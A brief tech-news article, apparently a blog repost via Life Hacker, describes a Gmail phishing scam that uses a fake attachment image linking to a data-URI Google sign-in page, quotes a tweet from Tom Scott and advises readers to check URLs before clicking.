Normally, phishing scams are pretty easy to detect but some of these are devilishly clever and might dupe you if you are not clever. Attackers most often disguised themselves as someone you know and the worst of it is that everything about them seems pretty normal. A recent such attempt has targeted Google.
The attacker has been found to do rounds with Gmail inboxes. In this phishing scam, users are sent an email with an attachment that looks legitimate. In order to preview it, users click on the attachment. At this point, users get to see an embedded image. Upon clicking it, users generally spot an attached file and are directed to a Google sign-in page where they are asked to enter their password.
In reality, these aren’t any attachments. The embedded image is designed to appear as attachments but instead, they link to fake pages. The sources report that the page is actually a data URI with a prefix “data: text/html”. It does not hold the typical HTTPS-secured URL that mostly users expect. When people fall for such scams, the attackers use their credentials for all kinds of abuse. They use the existing information for sending more phishing emails to a user’s contacts.
This is the closest I’ve ever come to falling for a Gmail phishing attack. If it hadn’t been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh
— Tom Scott (@tomscott) December 23, 2016
Right now, Chrome is addressing the issue by displaying such messages as non-secure on the form page in the address bar. With very few clues to hint an email as a phishing attempt, it is within the realm of acceptance that people actually fall for it. But to be on the safe side, its better check the URL next time before clicking an attachment in an email.
Via: Life Hacker